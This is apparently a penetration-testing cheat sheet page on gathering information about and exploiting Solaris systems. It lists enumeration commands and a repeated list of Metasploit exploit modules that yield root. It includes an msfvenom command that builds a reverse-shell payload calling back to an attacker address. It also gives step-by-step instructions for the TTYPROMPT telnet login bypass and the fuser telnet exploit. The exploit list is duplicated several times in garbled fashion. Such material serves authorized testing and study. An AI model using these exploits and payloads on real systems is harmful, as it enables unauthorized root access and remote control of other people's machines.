Solaris
Information gathering and exploitation
Last updated
Was this helpful?
Information gathering and exploitation
Last updated
Was this helpful?
View patches
showrev -p
Installed packages:
Pkginfo OR pkginfo -x
Host information
uname -a
Show IP interface:
Ifconfig -a
Process list:
/usr/ucb/ps -auxww
Patch Check Advanced (PCA) generates lists of installed and missing patches for Oracle Solaris systems and optionally downloads patches. It resolves dependencies between patches and installs them in correct order. It can be the only tool you ever need for patch management, be it on a single machine or a complete network. Just one perl script, it doesn't need compilation nor installation, and it doesn't need root permissions to run. It works on all versions of Solaris, both SPARC and x86.
./pca.pl –f . –l missings
will produce a list of missing patches, the following is an example. Note the ‘.’ Represents the current directory so ensure that the three files are in the same directory.
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
fuser TELNET - authentication bypass through -f command - can be manually exploited
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
fuser TELNET - authentication bypass through -f command - can be manually exploited
finger '1 2 3 4 5 6 7 8 9 0'@target
https://github.com/0xdea/exploits
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:
Metasploit:
Solaris in.telnetd TTYPROMPT Buffer Overflow
exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.
Command line:
Metasploit:
msf > use exploit/solaris/telnet/fuser